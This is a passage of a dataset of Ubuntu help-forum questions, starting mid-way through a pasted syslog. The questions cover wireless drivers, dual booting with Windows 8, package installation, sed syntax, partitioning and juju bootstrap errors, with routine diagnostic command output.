20:52:19 marc-linux networkmanager [ 1002 ] : < info > domain name 'home' apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... apr 23 20:52:19 marc-linux avahi-daemon [ 975 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.25.7 . apr 23 20:52:19 marc-linux avahi-daemon [ 975 ] : new relevant interface eth0.ipv4 for mdns . apr 23 20:52:19 marc-linux avahi-daemon [ 975 ] : registering new address record for 192.168.25.7 on eth0.ipv4 . apr 23 20:52:19 marc-linux dhclient : bound to 192.168.25.7 -- renewal in 39834 seconds . apr 23 20:52:19 marc-linux gdm-simple-slave [ 1168 ] : warning : failed to give slave programs access to the display . trying to proceed . apr 23 20:52:19 marc-linux dbus [ 946 ] : [ system ] activating service name='org.freedesktop.accounts ' ( using servicehelper ) apr 23 20:52:19 marc-linux accounts-daemon [ 1297 ] : started daemon version 0.6.29 apr 23 20:52:19 marc-linux dbus [ 946 ] : [ system ] successfully activated service 'org.freedesktop.accounts' apr 23 20:52:19 marc-linux dbus [ 946 ] : [ system ] activating service name='org.freedesktop.consolekit ' ( using servicehelper ) apr 23 20:52:19 marc-linux dbus [ 946 ] : [ system ] successfully activated service 'org.freedesktop.consolekit' apr 23 20:52:20 marc-linux gdm-launch-environment ] [ 1294 ] : glib-critical : g_variant_compare : assertion ` ! g_variant_is_container ( a ) ' failed apr 23 20:52:20 marc-linux gdm-launch-environment ] [ 1294 ] : glib-critical : g_variant_compare : assertion ` ! g_variant_is_container ( a ) ' failed apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > dns : starting dnsmasq ... apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < warn > dnsmasq not available on the bus , ca n't update servers . apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < error > [ 1366761140.496992 ] [ nm-dns-dnsmasq.c:402 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'org.freedesktop.networkmanager.dnsmasq ' : no such name apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < warn > dns : plugin dnsmasq update failed apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > writing dns information to /sbin/resolvconf apr 23 20:52:20 marc-linux dnsmasq [ 1429 ] : started , version 2.65 cache disabled apr 23 20:52:20 marc-linux dnsmasq [ 1429 ] : compile time options : ipv6 gnu-getopt dbus i18n idn dhcp dhcpv6 no-lua tftp conntrack apr 23 20:52:20 marc-linux dnsmasq [ 1429 ] : dbus support enabled : connected to system bus apr 23 20:52:20 marc-linux dnsmasq [ 1429 ] : warning : no upstream servers configured apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) successful , device activated . apr 23 20:52:20 marc-linux dbus [ 946 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < warn > dnsmasq appeared on dbus : :1.20 apr 23 20:52:20 marc-linux networkmanager [ 1002 ] : < info > writing dns information to /sbin/resolvconf apr 23 20:52:20 marc-linux dnsmasq [ 1429 ] : setting upstream servers from dbus apr 23 20:52:20 marc-linux dnsmasq [ 1429 ] : using nameserver 192.168.25.1 # 53 apr 23 20:52:20 marc-linux dbus [ 946 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 23 20:52:22 marc-linux dbus [ 946 ] : [ system ] activating service name='org.freedesktop.upower ' ( using servicehelper ) apr 23 20:52:22 marc-linux dbus [ 946 ] : [ system ] successfully activated service 'org.freedesktop.upower' apr 23 20:52:23 marc-linux gdm-launch-environment ] [ 1294 ] : glib-critical : g_variant_compare : assertion ` ! g_variant_is_container ( a ) ' failed apr 23 20:52:23 marc-linux gdm-launch-environment ] [ 1294 ] : glib-critical : g_variant_compare : assertion ` ! g_variant_is_container ( a ) ' failed apr 23 20:52:23 marc-linux dbus [ 946 ] : [ system ] activating service name='org.freedesktop.realtimekit1 ' ( using servicehelper ) apr 23 20:52:23 marc-linux dbus [ 946 ] : [ system ] successfully activated service 'org.freedesktop.realtimekit1' apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : successfully called chroot . apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : successfully dropped privileges . apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : successfully limited resources . apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : running . apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : watchdog thread running . apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : canary thread running . apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : successfully made thread 1744 of process 1744 ( n/a ) owned by '114 ' high priority at nice level -11 . apr 23 20:52:23 marc-linux rtkit-daemon [ 1746 ] : supervising 1 threads of 1 processes of 1 users . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : successfully made thread 1753 of process 1744 ( n/a ) owned by '114 ' rt at priority 5 . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : supervising 2 threads of 1 processes of 1 users . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : successfully made thread 1754 of process 1744 ( n/a ) owned by '114 ' rt at priority 5 . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : supervising 3 threads of 1 processes of 1 users . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : successfully made thread 1755 of process 1744 ( n/a ) owned by '114 ' rt at priority 5 . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : supervising 4 threads of 1 processes of 1 users . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : successfully made thread 1757 of process 1757 ( n/a ) owned by '114 ' high priority at nice level -11 . apr 23 20:52:24 marc-linux rtkit-daemon [ 1746 ] : supervising 5 threads of 2 processes of 1 users . apr 23 20:52:24 marc-linux pulseaudio [ 1757 ] : [ pulseaudio ] pid.c : daemon already running . apr 23 20:52:25 marc-linux dbus [ 946 ] : [ system ] activating service name='org.freedesktop.udisks2 ' ( using servicehelper ) apr 23 20:52:25 marc-linux udisksd [ 1766 ] : udisks daemon version 2.1.0 starting apr 23 20:52:25 marc-linux dbus [ 946 ] : [ system ] successfully activated service 'org.freedesktop.udisks2' apr 23 20:52:25 marc-linux udisksd [ 1766 ] : acquired the name org.freedesktop.udisks2 on the system message bus apr 23 20:52:26 marc-linux gnome-session [ 1424 ] : warning : detected that screensaver has left the bus apr 23 20:52:27 marc-linux gnome-session [ 1424 ] : warning : detected that screensaver has left the bus apr 23 20:52:27 marc-linux gnome-session [ 1424 ] : warning : app 'gnome-shell.desktop ' respawning too quickly apr 23 20:52:27 marc-linux gnome-session [ 1424 ] : critical : we failed , but the fail whale is dead . sorry ... . apr 23 20:52:29 marc-linux ntpdate [ 1553 ] : adjust time server 91.189.94.4 offset -0.339355 sec apr 23 20:52:36 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . apr 23 20:52:36 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 23 20:52:36 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 23 20:52:36 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . apr 23 20:57:17 marc-linux anacron [ 1095 ] : job `cron.daily ' started apr 23 20:57:17 marc-linux anacron [ 2274 ] : updated timestamp for job `cron.daily ' to 2013-04-23 thank you in advance .
284769	after installing ubuntu 12.04.2 , i ca n't load windows 8	i have a laptop with in-built windows 8 . i installed ubuntu 64 bit via the method shown on this ubuntu page : https : //help.ubuntu.com/community/uefi after use boot-repair , in grub menu it shows windows 8 as well . but on clicking it , it shows errors .
284770	how to disable kde wallet and have `` remember password '' working	when i log into my system i have a kde wallet password dialog . when i disable it , some passwords as wifi or ftp accounts do n't work any more , and the main problem - i dont have `` remember password '' any more . for example i disable kde wallet , reboot , and i have no kde wallet dialog , but my wifi ca n't connect , it does n't ask for password , just `` connecting '' , i give it 10 minutes , then delete ( remove ) the connection , after recreating it everything is fine . please help . kubuntu 12.04
284773	unable to connect to wireless after installing ubuntu 12.10	i am using asus u56e laptop and after installing ubuntu 12.10 alongside windows 8 , i am unable to connect to the wireless . i have been trying to solve this problem since two weeks and could n't solve it . please help . any answer would be appreciated . here are some command-line results . lspci -v | grep -ia 7 network ubuntu @ ubuntu : ~ $ lspci -v | grep -ia 7 network 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) subsystem : intel corporation centrino wireless-n + wimax 6150 bgn flags : bus master , fast devsel , latency 0 , irq 52 memory at de800000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi kernel modules : iwlwifi lsmod | grep iwlwifi ubuntu @ ubuntu : ~ $ lsmod | grep iwlwifi iwlwifi 386826 0 mac80211 539908 1 iwlwifi cfg80211 206566 2 iwlwifi , mac80211 ubuntu @ ubuntu : ~ $ dmesg | grep iwlwifi [ 57.846261 ] iwlwifi : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 57.846264 ] iwlwifi : copyright ( c ) 2003-2012 intel corporation [ 57.846336 ] iwlwifi 0000:02:00.0 : > pci_resource_len = 0x00002000 [ 57.846338 ] iwlwifi 0000:02:00.0 : > pci_resource_base = ffffc90000c7c000 [ 57.846341 ] iwlwifi 0000:02:00.0 : > hw revision id = 0x67 [ 57.846438 ] iwlwifi 0000:02:00.0 : > irq 52 for msi/msi-x [ 59.558335 ] iwlwifi 0000:02:00.0 : > loaded firmware version 41.28.5.1 build 33926 [ 59.558514 ] iwlwifi 0000:02:00.0 : > config_iwlwifi_debug disabled [ 59.558516 ] iwlwifi 0000:02:00.0 : > config_iwlwifi_debugfs enabled [ 59.558517 ] iwlwifi 0000:02:00.0 : > config_iwlwifi_device_tracing enabled [ 59.558519 ] iwlwifi 0000:02:00.0 : > config_iwlwifi_device_testmode enabled [ 59.558520 ] iwlwifi 0000:02:00.0 : > config_iwlwifi_p2p disabled [ 59.558522 ] iwlwifi 0000:02:00.0 : > detected intel ( r ) centrino ( r ) wireless-n + wimax 6150 bgn , rev=0x84 [ 59.558583 ] iwlwifi 0000:02:00.0 : > l1 disabled ; enabling l0s [ 59.569083 ] iwlwifi 0000:02:00.0 : > device eeprom ver=0x557 , calib=0x6 [ 59.569085 ] iwlwifi 0000:02:00.0 : > device sku : 0x150 [ 59.569087 ] iwlwifi 0000:02:00.0 : > valid tx ant : 0x1 , valid rx ant : 0x3 [ 59.569100 ] iwlwifi 0000:02:00.0 : > tunable channels : 13 802.11bg , 0 802.11a channels [ 70.208469 ] iwlwifi 0000:02:00.0 : > l1 disabled ; enabling l0s [ 70.208648 ] iwlwifi 0000:02:00.0 : > radio type=0x1-0x2-0x0 [ 70.366319 ] iwlwifi 0000:02:00.0 : > l1 disabled ; enabling l0s [ 70.366470 ] iwlwifi 0000:02:00.0 : > radio type=0x1-0x2-0x0 sudo lshw -c network ubuntu @ ubuntu : ~ $ sudo lshw -c network *-network description : wireless interface product : centrino wireless-n + wimax 6150 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 67 serial : 40:25 : c2:84:99 : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-17-generic firmware=41.28.5.1 build 33926 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:52 memory : de800000-de801fff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c0 serial : 54:04 : a6:2b:6a : ef capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:54 memory : dd400000-dd43ffff ioport : a000 ( size=128 ) ifconfig ubuntu @ ubuntu : ~ $ ifconfig eth0 link encap : ethernet hwaddr 54:04 : a6:2b:6a : ef up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:176 errors:0 dropped:0 overruns:0 frame:0 tx packets:176 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:14368 ( 14.3 kb ) tx bytes:14368 ( 14.3 kb ) wlan0 link encap : ethernet hwaddr 40:25 : c2:84:99 : c4 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) iwconfig ubuntu @ ubuntu : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off iwlist scan ubuntu @ ubuntu : ~ $ iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 no scan results nm-tool ubuntu @ ubuntu : ~ $ nm-tool networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : unavailable default : no hw address : 54:04 : a6:2b:6a : ef capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : disconnected default : no hw address : 40:25 : c2:84:99 : c4 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points hypeness2 : infra , 00:21:29 : da:08:4f , freq 2462 mhz , rate 54 mb/s , strength 42 wpa love : infra , 68:7f:74:17:02:66 , freq 2412 mhz , rate 54 mb/s , strength 19 wpa wpa2 direct-mwscx-3400pamela : infra , 02:15:99 : a3:3f : ac , freq 2412 mhz , rate 54 mb/s , strength 22 wpa2 router : infra , 1c : af : f7 : d6:76 : f3 , freq 2417 mhz , rate 54 mb/s , strength 20 wpa2 wing : infra , e8:40 : f2:34 : e4 : f7 , freq 2437 mhz , rate 54 mb/s , strength 20 wpa wpa2 132linksys : infra , 00:1a:70:80:1f : e9 , freq 2437 mhz , rate 54 mb/s , strength 57 wep vmittal : infra , e0:46:9a:3c : f0 : c4 , freq 2412 mhz , rate 54 mb/s , strength 27 wep hp-print-10-laserjet 1025 : infra , 7c : e9 : d3:7e : f8:10 , freq 2437 mhz , rate 54 mb/s , strength 59 acnbb : infra , 00:26:75:22 : a6:2f , freq 2437 mhz , rate 54 mb/s , strength 20 satkaival : infra , 00:18 : e7 : ce:69 : a6 , freq 2412 mhz , rate 54 mb/s , strength 69 wpa wpa2 hypeness : infra , b8 : e6:25:24 : c3 : b1 , freq 2437 mhz , rate 54 mb/s , strength 54 wpa wpa2 csnetwork : infra , bc:14:01:58 : c5:88 , freq 2437 mhz , rate 54 mb/s , strength 25 wpa wpa2 tharma : infra , bc:14:01 : e2:06:18 , freq 2412 mhz , rate 54 mb/s , strength 15 wpa wpa2 active2.4 : infra , 10:6f:3f:0e : f3:8e , freq 2462 mhz , rate 54 mb/s , strength 17 wpa wpa2 acnbb : infra , 00:26:75:58:4e:7a , freq 2437 mhz , rate 54 mb/s , strength 85 ko : infra , bc:14:01:2e : af : a8 , freq 2452 mhz , rate 54 mb/s , strength 22 wpa wpa2 fear : infra , 00:18:4d : c0 : bc:58 , freq 2462 mhz , rate 54 mb/s , strength 17 wpa pamela : infra , bc:14:01:52 : f6 : f8 , freq 2412 mhz , rate 54 mb/s , strength 24 wpa wpa2 bvrk2 : infra , 78 : cd:8e:7b:3c:79 , freq 2457 mhz , rate 54 mb/s , strength 19 wpa wpa2 bell030 : infra , d8:6c : e9:17 : af:09 , freq 2462 mhz , rate 54 mb/s , strength 22 wpa2 desai : infra , 00:1d:7e:52 : fb : c5 , freq 2437 mhz , rate 54 mb/s , strength 14 wep sritharan : infra , bc:14:01 : e5:59:78 , freq 2462 mhz , rate 54 mb/s , strength 19 wpa wpa2 pfn : infra , 00:13:10:8b : cf:45 , freq 2437 mhz , rate 54 mb/s , strength 19 wep rfkill list all ubuntu @ ubuntu : ~ $ rfkill list all 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-wimax : wimax soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no so these are some more results sudo modprobe -r iwlwifi ubuntu @ ubuntu : ~ $ sudo modprobe -r iwlwifi sudo modprobe iwlwifi 11n_disable=1 ubuntu @ ubuntu : ~ $ sudo modprobe iwlwifi 11n_disable=1 echo `` blacklist asus_wmi '' | sudo tee -a /etcmodprobe.d/blacklist.conf ubuntu @ ubuntu : ~ $ echo `` blacklist asus_wmi '' | sudo tee -a /etc/modprobe.d/blacklist.conf blacklist asus_wmi echo `` options iwlwifi 11n_disable=1 '' | sudo tee /etc/modprobe.d/iwlwifi.conf ubuntu @ ubuntu : ~ $ echo `` options iwlwifi 11n_disable=1 '' | sudo tee /etc/modprobe.d/iwlwifi.conf options iwlwifi 11n_disable=1 sudo modprobe -rfv iwlwifi ubuntu @ ubuntu : ~ $ sudo modprobe -rfv iwlwifi rmmod /lib/modules/3.5.0-17-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko rmmod /lib/modules/3.5.0-17-generic/kernel/net/mac80211/mac80211.ko rmmod /lib/modules/3.5.0-17-generic/kernel/net/wireless/cfg80211.ko sudo modprobe -v iwlwifi ubuntu @ ubuntu : ~ $ sudo modprobe -v iwlwifi insmod /lib/modules/3.5.0-17-generic/kernel/net/wireless/cfg80211.ko insmod /lib/modules/3.5.0-17-generic/kernel/net/mac80211/mac80211.ko insmod /lib/modules/3.5.0-17-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko 11n_disable=1
284779	g++ installation	i tried installing gpp in my ubuntu 12.04 , but i ca n't install it . it reports , sudo apt-get install gpp [ sudo ] password for akash : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gpp i tried locating the file gpp by find / -type f -name gpp but it says permission denied in all course .
284781	ca n't get $ ( date + % f ) set as environment variable	i would like to create an evironment variable that will output the current date . i have added the following to ~/.pam_environment : today= $ ( date + % f ) apparently you have to log out after changing ~/.pam_environment . i did that but echo $ today outputs a blank line . what am i doing wrong ?
284785	ca n't uninstall ubuntu wubi after upgrading windows to windows 8	i installed ubuntu via wubi on windows 7 , and i upgraded my laptop to windows 8 . the dual boot option and ubuntu work fine , but i can not uninstall it ; it does not appear in the programs .
284790	installing mediawiki	i have installed unbuntu 12.10 on virtualbox on my windows 7 machine . i am trying to install mediawiki . i have done alright so far , as it has brought me through the installation process and gave me a link to access the wiki after i saved localsettings.php when i try to access the wiki i get the following : warning : require_once ( /opt/lampp/htdocs/wiki/mediawiki-1.20.4/localsettings.php ) : failed to open stream : permission denied in /opt/lampp/htdocs/wiki/mediawiki-1.20.4/includes/webstart.php on line 134 fatal error : require_once ( ) : failed opening required '/opt/lampp/htdocs/wiki/mediawiki-1.20.4/localsettings.php ' ( include_path= ' . : /opt/lampp/lib/php ' ) in /opt/lampp/htdocs/wiki/mediawiki-1.20.4/includes/webstart.php on line 134 i am unsure what to do to continue/resolve the issue . i do know that i had a hell of a time extracting mediawiki to the the correct folder as i did n't have permission and had to user sudo nautilus to get it done . any and all advice is much appreciated .
284793	samsung rv515 trackpad issues	i 'm currently on a samsung rv515 laptop running windows 7 . i 'm relatively new to the world of linux in general , so i started with the wubi installer to keep things simple . it worked great , however each time i installed it my trackpad would be extremely laggy , in a sense that it was unresponsive , except in small quick and entirely inaccurate bursts . since then i 've installed it multiple times , run several other forms of linux based off of ubuntu such as linux mint , and backtrack , and even booted from a disc ( without actually installing ) and everything worked great but the trackpad issue persisted , i was able to get a simple usb plug in dell mouse that worked just fine , but i 'd really like to use my trackpad . i 've seen another thread or question on this site from a user that i believe is experiencing similar problems , however it was closed without an answer . i 've been looking up answers for months now and have n't found any . any help would be greatly appreciated ( but please be specific , i 'm new to ubuntu and linux and frankly a complete idiot with minimal knowledge on how the terminal works . ) and if it helps the touchpad does work perfectly on windows 7 normally , or at least i 've never had any issues with it outside of linux .
284797	ubuntu 12.04 lts via parallels ; ca n't disable automatic login	i 'm running ubuntu 12.04 lts via parallels desktop on mac os x mountain lion . i have all available updates . when i go into users , it does n't matter if i set my user account in system settings to automatic login turned off . i 've turned it on , turned it off , restarted , repeat . nothing works . i ran sudo gpasswd -d user nopasswdlogin with user replace with my own username and it says [ sudo ] password for parallels : but i ca n't type anything . i also tried passwd and it says : changing password for parallels . ( current ) unix password : but again , it does n't let me type anything .
284800	empathy does n't seem to be connected to ubuntu online accounts	i made the decision to switch from pidgin to empathy on my ubuntu 12.10 netbook . however , after uninstalling pidgin and installing empathy , there seems to be a disconnect between empathy and ubuntu online accounts in terms of setting up accounts . after installing the prerequisite plugins , i setup my accounts in uoa . all accounts connect fine in uoa . a drop-down list mentions that empathy is a program that can be associated with the accounts . however , when i setup , for example , my aim account , uoa says there is no application installed to use the account . i get the same with windows live and yahoo . oddly enough , yahoo works in empathy . the accounts connect fine . but uoa insists there 's no installed application that connects with the accounts . so far i 've found that irc , yahoo and google connect fine in empathy ( though irc is not configurable for nickserv ) , but facebook , aim , windows live , and groupwise have authentication problems ( even though the accounts all connect fine in uoa ) .
284807	unable to see wireless network	i have hp 530 laptop , i installed ubuntu 12.10 os . i am unable to see/enable wireless network . please help me with this .
284808	revert to previous package on ubuntu server 12.10	i have a package whose recent update i believe to be causing some issues . when i look in /var/log/apt/history.log i see this : start-date : 2013-04-20 18:32:05 commandline : apt-get upgrade upgrade : python-mysqldb : i386 ( 1.2.3-1build1 , 1.2.3-1ubuntu0.1 ) , ... # does n't matter end-date : 2013-04-20 18:32:43 basically , what i would like to do is revert to the previous version of python-mysqldb how would i go about doing that ?
284809	how can i batch convert .rpms to .debs in ubuntu ?	i want to install the daily current build of libreoffice in ubuntu but they only make it available in .rpms . i know i 'm supposed to use alien to convet .rpms to .debs but i ca n't find a command to batch convert all of them in the rpms folder in my ubuntu 12.04 . ( there 's dozens ) i know there 's a command to batch install .debs , but i 'm looking for a similar one to convert .rpms . does anybody know a command that would allow me to do that ? thank you !
284813	how can i connect my laptop to wifi ?	my lenovo g480 does not detect my wireless network when i 'm running ubuntu , but it has no problem in windows 7 . when i boot with ubuntu , it immediately displays a message saying `` you are disconnected . '' and when i try to check for wireless networks , it does n't display anything .
284815	getting bluetooth to work using asus bt211 with dell inspiron e1505	i 'm using an asus bt211 usb bluetooth adapter on my dell inspiron e1505 and i can not seem to get it running . i 've tried many different searches and turned up nothing , at least not for modern versions of ubuntu . i 'm not sure what further information i should post , so please let me know and i 'll post it . i 've tried using ubuntu 's bluetooth manager and i 've tried using blueman , neither seem to do the trick . any ideas ?
284821	see workspace name in taskbar	in 11.10 i could set preferences and apply names to the different workspaces . in 12.10 i installed compizconfig setttings manager and enabled workspace naming , and i can get the names to show up when switching to a workspace , but in 11.10 the name of the current workspace showed up in the bottom right-hand corner , i.e . in the taskbar . is there a setting that will add the name of the workspace to the taskbar , or some other place , so that i can easily see which workspace i 'm in ? btw - i 've answered my own question , i just needed to use metacity instead of compiz .
284822	new to ubuntu ive installed on dual boot running windows 8.. very buggy and freezes . help !	hello im new to ubuntu and im having a little difficulties ... i dual boot and im running windows 8 and ubuntu 12.10 and im having issues with storage its lagging it freezes all the time . i installed ubuntu thru the easy install for windows can anyone help me , im eventually goign to leave windows 8 but want to make sure that ubuntu is the route i want to go with so far i love it but i cant
284824	installing crossover 11.3.1 .deb fails	i keep getting the same messege every time i install a deb file : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 489 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/core.py '' , line 669 , in _install_package_files interaction , sender ) typeerror : install_package_files ( ) takes exactly 4 arguments ( 5 given )
284832	gillson font is displaying as times new roman	in my application i am applying gill san font it is working in windows , but in ubuntu it is displaying as times new roman.i have libre office in my ubuntu system.but why it is not supporting gill san font ?
284839	how to install vmware converter on ubuntu 12.04	i bought a laptop . it came with windows . i prefer to use ubuntu . i need to use windows at times . i would like to migrate the oem windows installation to a virtual machine within ubuntu . that is the long-term goal . for the moment i would like to install and use vmware converter on ubuntu 12.04 x64 . here is the most relevant google hit on this topic : http : //linhost.info/2009/04/vmware-converter-installation-on-ubuntu-linux/ you need to follow this link and register with vmware to download the converter . i did this . note that v4.0.1 is the most recent version available for ubuntu . http : //www.vmware.com/products/converter/overview.html i installed vmware converter and the installer reported success . here 's what happens when i try to run it : jack @ lumpy : ~/downloads/vmware-converter-distrib $ vmware-converter-client /usr/lib/vmware-vcenter-converter-standalone/converter-gui : error while loading shared libraries : libxrandr.so.2 : can not open shared object file : no such file or directory libxrandr-dev and libxrandr2 are installed via synaptic . no help . no useful hits on google . i tried to link the existing libraries on my system . a different error results . jack @ lumpy : ~/downloads/vmware-converter-distrib $ locate libxrandr.so.2 /usr/lib/x86_64-linux-gnu/libxrandr.so.2 /usr/lib/x86_64-linux-gnu/libxrandr.so.2.2.0 jack @ lumpy : ~/downloads/vmware-converter-distrib $ sudo ln -s /usr/lib/x86_64-linux-gnu/libxrandr.so.2 /usr/lib/libxrandr.so.2 jack @ lumpy : ~/downloads/vmware-converter-distrib $ vmware-converter-client /usr/lib/vmware-vcenter-converter-standalone/converter-gui : error while loading shared libraries : libxrandr.so.2 : wrong elf class : elfclass64 i 've previously received elf class errors when i 've tried to substitute 64-bit libraries for 32-bit software . am i out of luck here ? is there no way to install vmware converter on 64-bit ubuntu ?
284840	sed does not work	i tried to use the sed command to do some text replacement , sed -i 's/port=\ '' 8080\ '' /port= '' \8000\ '' ' /opt/apache-tomcat-7.0.37/conf/server.xml but i meet this error : sed : -e expression # 1 , char 9 : unterminated `s ' command what is the problem ?
284841	repartition hdd to give ubuntu more space	my laptop came installed with windows 7 and 320 gb of hard drive space . a few weeks ago i decided to try ubuntu for a change , and created a 30gb partition for it . now , i want to give more space for the ubuntu partition because i want to use ubuntu os permanently and probably migrate completely sometime soon from w7 . i tried gparted editor but i ca n't resize/move partitons ( i see a lock icon next to partitions ) . how do i resize the w7 partition from ubuntu ? is it possible ? can i `` unmount '' the w7 partition and then resize it without breaking it ?
284842	let popup appear when logging in to guest account	when logging out from the guest account , all the files of the guest are deleted . i like this behavior , but is there a way to show a popup like `` warning , all your files will be removed when turning off the computer or logging out , better move them on an usb-stick first '' when a guest logs in and/or out ? also , are a guest 's files really deleted or are they moved to a hidden place on the computer ?
284845	copying files and inherit permissions of target folder	when i copy files to a usb disk or another account on the same disk the permissions are not changed to the target . for example , when i copy files from account x to a folder of account y , than the permission on the files are still of account x. i like to copy files and change the permissions to that of account y . how do i do this ?
284846	juju does n't bootstrap due to `` error command failed : no tools available '' error	i 've seen other posts ( e.g . this link ) , but i 'm still struggling to install juju on my openstack cluster . i have swift working , but juju does n't seem to want to bootstrap . i created the bucket ( i tried without the bucket existing and had the same problem ) : zestrada @ cloud1 : ~ $ swift list juju-44c885823005ec6033e09c81f99980a6 zestrada @ cloud1 : ~ $ juju bootstrap -e openstack -v 2013/04/24 01:46:36 info environs/openstack : opening environment `` openstack '' 2013/04/24 01:46:36 info environs/openstack : bootstrapping environment `` openstack '' 2013/04/24 01:46:46 info environs : reading tools with major version 1 2013/04/24 01:46:46 info environs : falling back to public bucket 2013/04/24 01:46:46 error command failed : no tools available error : no tools available i 've tried with and without the -e openstack switch , yielding identical results . trying with juju-origin : ppa resulted in error command failed : juju-origin : expected nothing , got `` ppa '' i also tried manually specifying the auth-url - but again , no change . here are the relevant parts of my environments.yaml : zestrada @ cloud1 : ~ $ grep -a25 openstack : .juju/environments.yaml | grep -vp `` \s+ # '' openstack : type : openstack admin-secret : secret control-bucket : juju-44c885823005ec6033e09c81f99980a6 default-image-id : `` 119295c7-2afc-4eda-bd64-2f8bef894b0d '' default-instance-type : `` 1.small '' auth-mode : userpass my environment variables are correct since i can access all installed services ( nova , swift , cinder , glance , keystone ) with no trouble .
